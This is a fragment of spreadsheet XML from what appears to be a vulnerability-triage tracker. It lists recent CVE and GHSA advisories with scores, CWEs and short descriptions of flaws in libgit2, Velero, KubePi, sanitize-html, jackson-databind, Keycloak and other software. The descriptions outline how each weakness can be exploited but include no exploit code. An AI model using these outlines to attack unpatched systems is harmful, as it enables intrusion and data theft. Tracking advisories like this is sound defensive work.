        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53583</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, verify_server_cert in src/libgit2/streams/openssl.c uses an inverted !!memcmp result in the GEN_IPADD branch when comparing an IP-literal host with a certificate IP SubjectAltName. OpenSSL builds reject matching IP addresses and accept mismatched IP addresses, allowing a network attacker with a CA-trusted certificate containing any IP SubjectAltName to intercept libgit2 connections to IP-literal HTTPS URLs. DNS SubjectAltName validation and non-OpenSSL TLS backends are not affected. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53583</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19634</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a SQL injection vulnerability in two import functions. A user can create a malicious JSON document containing specially crafted object names. If a superuser subsequently calls anon.import_database_rules() or anon.import_roles_rules(), the malicious code is executed with superuser privileges. The issue is fixed in PostgreSQL Anonymizer 3.1.4 and later</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19634</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83534</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability in the anon.anonymize_database_parallel() function that allows the owner of a table to run arbitrary code with superuser privilege. The issue is fixed in PostgreSQL Anonymizer 3.2.0 and later versions</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83534</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32637</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>Velero is an open source tool for backing up, restoring, and migrating Kubernetes cluster resources and persistent volumes. Prior to 1.18.1, an attacker who compromises the backup object-storage backend can upload a malicious backup tarball containing parent-directory paths that escape the extraction directory during restore and overwrite sensitive files in the Velero pod filesystem. This issue is fixed in version 1.18.1.</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32637</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69129</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>KubePi is a Kubernetes multi-cluster management panel. In versions up to and including 2.0.0, cluster-scoped APIs do not consistently validate per-cluster access, allowing an authenticated user with cluster management permissions to operate on clusters outside the scope they were granted. Because the affected endpoints act on cluster-specific data without confirming that the requesting user is authorized for that particular cluster, a user assigned management rights over one cluster can, under certain role and cluster configurations, read or modify data in clusters they should not manage. This issue is fixed in version 2.0.1.</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69129</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85788</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in the mutable SQL detector component in Amazon awslabs mysql-mcp-server might allow context-dependent actors to bypass the read-only enforcement gate and reach file-read and file-write SQL sinks via SQL inline comments that the regex engine does not treat as whitespace.
To remediate this issue, users should upgrade to version 1.0.23.</t>
        </is>
      </c>
      <c r="S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85788</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86222</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in SourceCodester Class and Exam Timetabling System 1.0. This affects the function mysqli_query of the file /admin/modal_add_course2.php. Such manipulation of the argument course leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86222</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84371</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. From version 1.9.0 until version 2.17.7, packages/sanitize-html/index.js validates an animation value attribute as one flat URL and does not recognize that attributeName selecting href or xlink:href gives the sibling values, from, to, or by attribute SVG SMIL URL semantics. In configurations that allow the animate, animateColor, animateMotion, animateTransform, or set elements, a values list can begin with a safe fragment and contain a later executable destination that survives allowedSchemesAppliedToAttributes checking. When the sanitized SVG is rendered, the browser can copy that later destination into the live link, and a victim who activates the link can execute script in the application's origin. This issue is fixed in version 2.17.7.</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84371</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77310</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>jackson-databind</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. Prior to versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1 on their respective release lines, the java.net.InetAddress branch of FromStringDeserializer.Std._deserialize() calls InetAddress.getByName() on attacker-controlled input, causing eager DNS resolution during deserialization and enabling DNS-based server-side request forgery and internal-host enumeration. This issue is fixed in versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1.</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77310</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84967</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>A component of the MongoDB extension for Visual Studio Code does not neutralize special characters in a connection string before that value is placed into a command line the extension composes for an integrated terminal. An unauthenticated remote unauthorized-user who persuades a developer to accept a user-supplied connection target, and then to open the extension's shell feature, can place characters of the unauthorized-user’s choosing into that command line. No privileges on the developer's machine are required, but several user actions are. The confirmation the developer sees does not display the supplied text.</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84967</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19729</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the key provider component of the keycloak-services library, which is the core engine for the Red Hat Build of Keycloak. The issue occurs because a previous fix for path probing was incomplete, allowing a realm administrator to still submit arbitrary filesystem paths as keystore parameters. This can be used to determine the existence and readability of files on the server, potentially exposing sensitive system information.</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19729</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53487</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>Kite is a Kubernetes dashboard. Prior to version 0.12.3, authenticated Kite users with any role can request `/api/v1/overview` for a cluster that their roles do not permit by selecting that cluster with `x-cluster-name`. The overview route is registered before `middleware.RBACMiddleware()` and `GetOverview` only checks `len(user.Roles) &gt; 0`, so it returns aggregate Kubernetes inventory and capacity data from unauthorized clusters. Version 0.12.3 fixes the issue.</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53487</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S40"/>
  <conditionalFormatting sqref="E2:E4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0">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1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P2 - High</t>
        </is>
      </c>
      <c r="B2" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63310</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr"/>
      <c r="P2" s="5" t="inlineStr"/>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-5wp5-5229-5g6q. This link is maintained to preserve external references.
## Original Description
NLTK before 3.9.3 fails to verify file integrity after downloading packages and before extraction in the downloader module. Attackers can perform man-in-the-middle attacks or DNS poisoning to inject malicious package contents that are extracted without validation.</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63310</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M3" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr"/>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R3"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S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>GHSA-rg7q-4223-phjw</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>composer:wwbn/avideo</t>
        </is>
      </c>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr"/>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-wprj-9cvc-5w37. This link is maintained to preserve external references.
### Original Description
AVideo through version 26.0 contains multiple unauthenticated list.json.php endpoints in payment plugins lacking authorization checks, exposing PayPal tokens, Authorize.Net webhooks, and Bitcoin transaction records. Unauthenticated attackers can retrieve all payment transaction data including agreement IDs, user financial records, and API responses via direct GET requests to vulnerable endpoints.</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-rg7q-4223-phjw</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85730</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>npm:smol-toml</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>1.7.1</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-835</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
